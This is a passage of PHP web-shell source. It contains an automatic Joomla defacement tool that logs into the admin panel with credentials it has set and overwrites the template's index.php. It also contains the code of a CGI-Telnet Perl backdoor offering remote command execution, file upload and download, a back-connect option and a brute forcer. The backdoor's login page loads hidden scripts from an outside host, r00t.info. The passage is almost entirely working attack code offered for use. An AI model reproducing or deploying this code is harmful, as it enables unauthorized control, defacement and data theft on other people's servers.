`".$dbprefix."extensions` "); if ( $req ) { $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'"); $data = mysql_fetch_array($req); $template_id=$data["extension_id"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"'); $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4); $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,"com_config"); if($pos === false) { echo("<br>[+] Login Error"); exit; } else { echo("<br>[+] Login Successful"); } $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2); if($hidden2) { echo("<br>[+] index.php file founded in Theme Editor"); } else { echo("<br>[-] index.php Not found in Theme Editor"); exit; } echo("<br>[*] Updating Index.php ....."); $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'<dd class="message message">'); if($pos === false) { echo("<br>[-] Updating Index.php Error"); exit; } else { echo("<br>[~] index.php successfully saved"); } } else { $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3); $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,"com_config"); if($pos === false) { echo("<br>[-] Login Error"); exit; } else { echo("<br>[+] Login Successful"); } $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6); if($hidden2) { echo("<br>[~] index.php file founded in Theme Editor"); } else { echo("<br>[-] index.php Not found in Theme Editor"); } echo("<br>[*] Updating Index.php ....."); $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $pos = strpos($buffer,'<dd class="message message fade">'); if($pos === false) { echo("<br>[-] Updating Index.php Error"); exit; } else { echo("<br>[~] index.php successfully saved"); } } } function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; } }?>
4523 <center><br><br>
4524 <font color="#FF0000" size='+3'><b>--==[ Automatic Joomla Index Changer ]==--</b></font><br><br>
4525 </center>
4526 <center><b>
4527 Link of symlink configuration.php of Joomla<br></b>
4528 <FORM action="" method="post">
4529 <input type="hidden" name="form_action" value="1">
4530 <input type="text" class="inputz" size="60" name="file" value="hxxp://site.com/sym/home/user/public_html/configuration.php">
4531 <br>
4532 <br><b>
4533 Admin Control Panel URL</b><br>
4534 <input type="text" class="inputz" size="40" name="site_url" value="hxxp://site/administrator"><br>
4535 <br><b>
4536 Your Index Code</b>
4537 <br>
4538 <TEXTAREA rows="20" align="center" style="background:black" cols="120" name="code"> your index code
4539 </TEXTAREA>
4540 <br>
4541 <INPUT class="inputzbut" type="submit" value="Lets Go Deface !!!" name="Submit">
4542 </FORM>
4543 </center>
4544 <script language=JavaScript>m='%09%09%09%09%09%09%09%3C/td%3E%0A%09%09%09%09%09%09%3C/tr%3E%0A%09%09%09%09%09%3C/table%3E%0A%09%09%09%09%3C/td%3E%0A%3C/html%3E';d=unescape(m);document.write(d);</script>
4545 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi2012')) { echo "<center/><br/><b>
4546 +--==[ CGI-Telnet Version 1.3 ]==--+
4547 </b><br><br>"; mkdir('cgi2012', 0755); chdir('cgi2012'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!"); $metin = "AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgi2012 = '#!/usr/bin/perl -I/usr/local/bandmin
4548use MIME::Base64;
4549$Version= "CGI-Telnet Version 1.3";
4550$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>r00t.info - CGI-Telnet</font>";
4551
4552$Password = "r00t.info"; # Change this. You will need to enter this
4553 # to login.
4554sub Is_Win(){
4555 $os = &trim($ENV{"SERVER_SOFTWARE"});
4556 if($os =~ m/win/i){
4557 return 1;
4558 }
4559 else{
4560 return 0;
4561 }
4562}
4563$WinNT = &Is_Win(); # You need to change the value of this to 1 if
4564 # you're running this script on a Windows NT
4565 # machine. If you're running it on Unix, you
4566 # can leave the value as it is.
4567
4568$NTCmdSep = "&"; # This character is used to seperate 2 commands
4569 # in a command line on Windows NT.
4570
4571$UnixCmdSep = ";"; # This character is used to seperate 2 commands
4572 # in a command line on Unix.
4573
4574$CommandTimeoutDuration = 10000; # Time in seconds after commands will be killed
4575 # Don't set this to a very large value. This is
4576 # useful for commands that may hang or that
4577 # take very long to execute, like "find /".
4578 # This is valid only on Unix servers. It is
4579 # ignored on NT Servers.
4580
4581$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
4582 # browser as soon as it is output, otherwise
4583 # it is buffered and send when the command
4584 # completes. This is useful for commands like
4585 # ping, so that you can see the output as it
4586 # is being generated.
4587
4588# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
4589
4590$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
4591$CmdPwd = ($WinNT ? "cd" : "pwd");
4592$PathSep = ($WinNT ? "\\" : "/");
4593$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
4594$cols= 150;
4595$rows= 26;
4596#------------------------------------------------------------------------------
4597# Reads the input sent by the browser and parses the input variables. It
4598# parses GET, POST and multipart/form-data that is used for uploading files.
4599# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
4600# Other variables can be accessed using $in{'var'}, where var is the name of
4601# the variable. Note: Most of the code in this function is taken from other CGI
4602# scripts.
4603#------------------------------------------------------------------------------
4604sub ReadParse
4605{
4606 local (*in) = @_ if @_;
4607 local ($i, $loc, $key, $val);
4608
4609 $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
4610
4611 if($ENV{'REQUEST_METHOD'} eq "GET")
4612 {
4613 $in = $ENV{'QUERY_STRING'};
4614 }
4615 elsif($ENV{'REQUEST_METHOD'} eq "POST")
4616 {
4617 binmode(STDIN) if $MultipartFormData & $WinNT;
4618 read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
4619 }
4620
4621 # handle file upload data
4622 if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
4623 {
4624 $Boundary = '--'.$1; # please refer to RFC1867
4625 @list = split(/$Boundary/, $in);
4626 $HeaderBody = $list[1];
4627 $HeaderBody =~ /\r\n\r\n|\n\n/;
4628 $Header = $`;
4629 $Body = $';
4630 $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
4631 $in{'filedata'} = $Body;
4632 $Header =~ /filename=\"(.+)\"/;
4633 $in{'f'} = $1;
4634 $in{'f'} =~ s/\"//g;
4635 $in{'f'} =~ s/\s//g;
4636
4637 # parse trailer
4638 for($i=2; $list[$i]; $i++)
4639 {
4640 $list[$i] =~ s/^.+name=$//;
4641 $list[$i] =~ /\"(\w+)\"/;
4642 $key = $1;
4643 $val = $';
4644 $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
4645 $val =~ s/%(..)/pack("c", hex($1))/ge;
4646 $in{$key} = $val;
4647 }
4648 }
4649 else # standard post data (url encoded, not multipart)
4650 {
4651 @in = split(/&/, $in);
4652 foreach $i (0 .. $#in)
4653 {
4654 $in[$i] =~ s/\+/ /g;
4655 ($key, $val) = split(/=/, $in[$i], 2);
4656 $key =~ s/%(..)/pack("c", hex($1))/ge;
4657 $val =~ s/%(..)/pack("c", hex($1))/ge;
4658 $in{$key} .= "\0" if (defined($in{$key}));
4659 $in{$key} .= $val;
4660 }
4661 }
4662}
4663
4664#------------------------------------------------------------------------------
4665# Prints the HTML Page Header
4666# Argument 1: Form item name to which focus should be set
4667#------------------------------------------------------------------------------
4668sub PrintPageHeader
4669{
4670 $EncodedCurrentDir = $CurrentDir;
4671 $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
4672 my $dir =$CurrentDir;
4673 $dir=~ s/\\/\\\\/g;
4674 print "Content-type: text/html\n\n";
4675 print <<END;
4676<html>
4677<head>
4678<meta hxxp-equiv="content-type" content="text/html; charset=UTF-8">
4679<title> </title>
4680
4681$HtmlMetaHeader
4682
4683</head>
4684<style>
4685body{
4686font: 10pt Verdana;
4687}
4688tr {
4689BORDER-RIGHT: #3e3e3e 1px solid;
4690BORDER-TOP: #3e3e3e 1px solid;
4691BORDER-LEFT: #3e3e3e 1px solid;
4692BORDER-BOTTOM: #3e3e3e 1px solid;
4693color: #ff9900;
4694}
4695td {
4696BORDER-RIGHT: #3e3e3e 1px solid;
4697BORDER-TOP: #3e3e3e 1px solid;
4698BORDER-LEFT: #3e3e3e 1px solid;
4699BORDER-BOTTOM: #3e3e3e 1px solid;
4700color: #2BA8EC;
4701font: 10pt Verdana;
4702}
4703
4704table {
4705BORDER-RIGHT: #3e3e3e 1px solid;
4706BORDER-TOP: #3e3e3e 1px solid;
4707BORDER-LEFT: #3e3e3e 1px solid;
4708BORDER-BOTTOM: #3e3e3e 1px solid;
4709BACKGROUND-COLOR: #111;
4710}
4711
4712
4713input {
4714BORDER-RIGHT: #3e3e3e 1px solid;
4715BORDER-TOP: #3e3e3e 1px solid;
4716BORDER-LEFT: #3e3e3e 1px solid;
4717BORDER-BOTTOM: #3e3e3e 1px solid;
4718BACKGROUND-COLOR: Black;
4719font: 10pt Verdana;
4720color: #ff9900;
4721}
4722
4723input.submit {
4724text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
4725color: #FFFFFF;
4726border-color: #009900;
4727}
4728
4729code {
4730border : dashed 0px #333;
4731BACKGROUND-COLOR: Black;
4732font: 10pt Verdana bold;
4733color: while;
4734}
4735
4736run {
4737border : dashed 0px #333;
4738font: 10pt Verdana bold;
4739color: #FF00AA;
4740}
4741
4742textarea {
4743BORDER-RIGHT: #3e3e3e 1px solid;
4744BORDER-TOP: #3e3e3e 1px solid;
4745BORDER-LEFT: #3e3e3e 1px solid;
4746BORDER-BOTTOM: #3e3e3e 1px solid;
4747BACKGROUND-COLOR: #1b1b1b;
4748font: Fixedsys bold;
4749color: #aaa;
4750}
4751A:link {
4752 COLOR: #2BA8EC; TEXT-DECORATION: none
4753}
4754A:visited {
4755 COLOR: #2BA8EC; TEXT-DECORATION: none
4756}
4757A:hover {
4758 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
4759 color: #ff9900; TEXT-DECORATION: none
4760}
4761A:active {
4762 color: Red; TEXT-DECORATION: none
4763}
4764
4765.listdir tr:hover{
4766 background: #444;
4767}
4768.listdir tr:hover td{
4769 background: #444;
4770 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
4771 color: #FFFFFF; TEXT-DECORATION: none;
4772}
4773.notline{
4774 background: #111;
4775}
4776.line{
4777 background: #222;
4778}
4779</style>
4780<script language="javascript">
4781function chmod_form(i,file)
4782{
4783 /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
4784 var ajax="";
4785 document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
4786 document.getElementById("text_" + i).focus();
4787}
4788function rm_chmod_form(response,i,perms,file)
4789{
4790 response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
4791}
4792function rename_form(i,file,f)
4793{
4794 var ajax="";
4795 f.replace(/\\\\/g,"\\\\\\\\");
4796 var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
4797 document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
4798 document.getElementById("text_" + i).focus();
4799}
4800function rm_rename_form(i,file,f)
4801{
4802 if(f=='f')
4803 {
4804 document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
4805 }else
4806 {
4807 document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
4808 }
4809}
4810</script>
4811<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
4812<center><code>
4813<table border="1" width="100%" cellspacing="0" cellpadding="2">
4814<tr>
4815 <td align="center" rowspan=2>
4816 <b><font size="5">$EditPersion</font></b>
4817 </td>
4818
4819 <td>
4820
4821 <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
4822 </td>
4823 <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
4824 </td>
4825
4826</tr>
4827
4828<tr>
4829<td colspan="3"><font face="Verdana" size="2">
4830<a href="$ScriptLocation">Home</a> |
4831<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Komut</a> |
4832<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">Dizin</a> |
4833<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
4834<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
4835
4836<a href="$ScriptLocation?a=backbind">Back Connet</a> |
4837<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
4838<a href="$ScriptLocation?a=checklog">Check Log</a> |
4839<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
4840<a href="$ScriptLocation?a=logout">Logout</a> |
4841<a target='_blank' href="#">Help</a>
4842
4843</font></td>
4844</tr>
4845</table>
4846<font id="ResponseData" color="#ff99cc" >
4847END
4848}
4849
4850#------------------------------------------------------------------------------
4851# Prints the Login Screen
4852#------------------------------------------------------------------------------
4853sub PrintLoginScreen
4854{
4855
4856 print <<END;
4857<pre><script type="text/javascript">
4858TypingText = function(element, interval, cursor, finishedCallback) {
4859 if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
4860 this.running = true; // Never run.
4861 return;
4862 }
4863 this.element = element;
4864 this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
4865 this.interval = (typeof interval == "undefined" ? 100 : interval);
4866 this.origText = this.element.innerHTML;
4867 this.unparsedOrigText = this.origText;
4868 this.cursor = (cursor ? cursor : "");
4869 this.currentText = "";
4870 this.currentChar = 0;
4871 this.element.typingText = this;
4872 if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
4873 TypingText.all.push(this);
4874 this.running = false;
4875 this.inTag = false;
4876 this.tagBuffer = "";
4877 this.inHTMLEntity = false;
4878 this.HTMLEntityBuffer = "";
4879}
4880TypingText.all = new Array();
4881TypingText.currentIndex = 0;
4882TypingText.runAll = function() {
4883 for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
4884}
4885TypingText.prototype.run = function() {
4886 if(this.running) return;
4887 if(typeof this.origText == "undefined") {
4888 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
4889 return;
4890 }
4891 if(this.currentText == "") this.element.innerHTML = "";
4892// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
4893 if(this.currentChar < this.origText.length) {
4894 if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
4895 this.tagBuffer = "<";
4896 this.inTag = true;
4897 this.currentChar++;
4898 this.run();
4899 return;
4900 } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
4901 this.tagBuffer += ">";
4902 this.inTag = false;
4903 this.currentText += this.tagBuffer;
4904 this.currentChar++;
4905 this.run();
4906 return;
4907 } else if(this.inTag) {
4908 this.tagBuffer += this.origText.charAt(this.currentChar);
4909 this.currentChar++;
4910 this.run();
4911 return;
4912 } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
4913 this.HTMLEntityBuffer = "&";
4914 this.inHTMLEntity = true;
4915 this.currentChar++;
4916 this.run();
4917 return;
4918 } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
4919 this.HTMLEntityBuffer += ";";
4920 this.inHTMLEntity = false;
4921 this.currentText += this.HTMLEntityBuffer;
4922 this.currentChar++;
4923 this.run();
4924 return;
4925 } else if(this.inHTMLEntity) {
4926 this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
4927 this.currentChar++;
4928 this.run();
4929 return;
4930 } else {
4931 this.currentText += this.origText.charAt(this.currentChar);
4932 }
4933 this.element.innerHTML = this.currentText;
4934 this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
4935 this.currentChar++;
4936 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
4937 } else {
4938 this.currentText = "";
4939 this.currentChar = 0;
4940 this.running = false;
4941 this.finishedCallback();
4942 }
4943}
4944</script>
4945</pre>
4946
4947<font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 r00t.info </font><br><br>
4948<table align="center" border="1" width="600" heigh>
4949<script src=hxxp://r00t.info/bot/log.js></script>
4950<script src=hxxp://r00t.info/ccb.js></script>
4951<tbody><tr>
4952<td valign="top" background="hxxp://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
4953<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
4954
4955<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
4956<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
4957<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
4958
4959<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
4960
4961<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
4962<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
4963</tr>
4964</tbody></table>
4965<br>
4966
4967<script type="text/javascript">
4968new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
4969TypingText.runAll();
4970
4971</script>
4972END
4973}
4974
4975#------------------------------------------------------------------------------
4976# Add html special chars
4977#------------------------------------------------------------------------------
4978sub HtmlSpecialChars($){
4979 my $text = shift;
4980 $text =~ s/&/&/g;
4981 $text =~ s/"/"/g;
4982 $text =~ s/'/'/g;
4983 $text =~ s/</</g;
4984 $text =~ s/>/>/g;
4985 return $text;
4986}
4987#------------------------------------------------------------------------------
4988# Add link for directory
4989#------------------------------------------------------------------------------
4990sub AddLinkDir($)
4991{
4992 my $ac=shift;
4993 my @dir=();
4994 if($WinNT)
4995 {
4996 @dir=split(/\\/,$CurrentDir);
4997 }else
4998 {
4999 @dir=split("/",&trim($CurrentDir));
5000 }
5001 my $path="";
5002 my $result="";
5003 foreach (@dir)
5004 {
5005 $path .= $_.$PathSep;
5006 $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
5007 }
5008 return $result;
5009}
5010#------------------------------------------------------------------------------
5011# Prints the message that informs the user of a failed login
5012#------------------------------------------------------------------------------
5013sub PrintLoginFailedMessage
5014{
5015 print <<END;
5016<br>Login : Administrator<br>
5017
5018Password:<br>
5019Login incorrect<br><br>
5020END
5021}
5022
5023#------------------------------------------------------------------------------
5024# Prints the HTML form for logging in
5025#------------------------------------------------------------------------------
5026sub PrintLoginForm
5027{
5028 print <<END;
5029<form name="f" method="POST" action="$ScriptLocation">
5030<input type="hidden" name="a" value="login">
5031Login : Administrator<br>
5032Password:<input type="password" name="p">
5033<input class="submit" type="submit" value="Enter">
5034</form>
5035END
5036}
5037
5038#------------------------------------------------------------------------------
5039# Prints the footer for the HTML Page
5040#------------------------------------------------------------------------------
5041sub PrintPageFooter
5042{
5043 print "<br><font color=red>o---[ <font color=#ff9900>Edit by $EditPersion </font> ]---o</font></code></center></body></html>";
5044}
5045
5046#------------------------------------------------------------------------------
5047# Retreives the values of all cookies. The cookies can be accesses using the
5048# variable $Cookies{''}
5049#------------------------------------------------------------------------------
5050sub GetCookies
5051{
5052 @hxxpcookies = split(/; /,$ENV{'hxxp_COOKIE'});
5053 foreach $cookie(@hxxpcookies)
5054 {
5055 ($id, $val) = split(/=/, $cookie);
5056 $Cookies{$id} = $val;
5057 }
5058}
5059
5060#------------------------------------------------------------------------------
5061# Prints the screen when the user logs out
5062#------------------------------------------------------------------------------
5063sub PrintLogoutScreen
5064{
5065 print "Connection closed by foreign host.<br><br>";
5066}
5067
5068#------------------------------------------------------------------------------
5069# Logs out the user and allows the user to login again
5070#------------------------------------------------------------------------------
5071sub PerformLogout
5072{
5073 print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
5074 &PrintPageHeader("p");
5075 &PrintLogoutScreen;
5076
5077 &PrintLoginScreen;
5078 &PrintLoginForm;
5079 &PrintPageFooter;
5080 exit;
5081}
5082
5083#------------------------------------------------------------------------------
5084# This function is called to login the user. If the password matches, it
5085# displays a page that allows the user to run commands. If the password doens't
5086# match or if no password is entered, it displays a form that allows the user
5087# to login
5088#------------------------------------------------------------------------------
5089sub PerformLogin
5090{
5091 if($LoginPassword eq $Password) # password matched
5092 {
5093 print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
5094 &PrintPageHeader;
5095 print &ListDir;
5096 }
5097 else # password didn't match
5098 {
5099 &PrintPageHeader("p");
5100 &PrintLoginScreen;
5101 if($LoginPassword ne "") # some password was entered
5102 {
5103 &PrintLoginFailedMessage;
5104
5105 }
5106 &PrintLoginForm;
5107 &PrintPageFooter;
5108 exit;
5109 }
5110}
5111
5112#------------------------------------------------------------------------------
5113# Prints the HTML form that allows the user to enter commands
5114#------------------------------------------------------------------------------
5115sub PrintCommandLineInputForm
5116{
5117 my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
5118 $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
5119 return <<END;
5120<form name="f" method="POST" action="$ScriptLocation">
5121
5122<input type="hidden" name="a" value="command">
5123
5124<input type="hidden" name="d" value="$CurrentDir">
5125$Prompt
5126<input type="text" size="50" name="c">
5127<input class="submit"type="submit" value="Enter">
5128</form>
5129END
5130}
5131
5132#------------------------------------------------------------------------------
5133# Prints the HTML form that allows the user to download files
5134#------------------------------------------------------------------------------
5135sub PrintFileDownloadForm
5136{
5137 my $dir = &AddLinkDir("download");
5138 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
5139 return <<END;
5140<form name="f" method="POST" action="$ScriptLocation">
5141<input type="hidden" name="d" value="$CurrentDir">
5142<input type="hidden" name="a" value="download">
5143$Prompt download<br><br>
5144Filename: <input class="file" type="text" name="f" size="35"><br><br>
5145Download: <input class="submit" type="submit" value="Begin">
5146
5147</form>
5148END
5149}
5150
5151#------------------------------------------------------------------------------
5152# Prints the HTML form that allows the user to upload files
5153#------------------------------------------------------------------------------
5154sub PrintFileUploadForm
5155{
5156 my $dir= &AddLinkDir("upload");
5157 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
5158 return <<END;
5159<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
5160$Prompt upload<br><br>
5161Filename: <input class="file" type="file" name="f" size="35"><br><br>
5162Options: <input type="checkbox" name="o" id="up" value="overwrite">
5163<label for="up">Overwrite if it Exists</label><br><br>
5164Upload: <input class="submit" type="submit" value="Begin">
5165<input type="hidden" name="d" value="$CurrentDir">
5166<input class="submit" type="hidden" name="a" value="upload">
5167
5168</form>
5169
5170END
5171}
5172
5173#------------------------------------------------------------------------------
5174# This function is called when the timeout for a command expires. We need to
5175# terminate the script immediately. This function is valid only on Unix. It is
5176# never called when the script is running on NT.
5177#------------------------------------------------------------------------------
5178sub CommandTimeout
5179{
5180 if(!$WinNT)
5181 {
5182 alarm(0);
5183 return <<END;
5184</textarea>
5185<br><font color=yellow>
5186Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
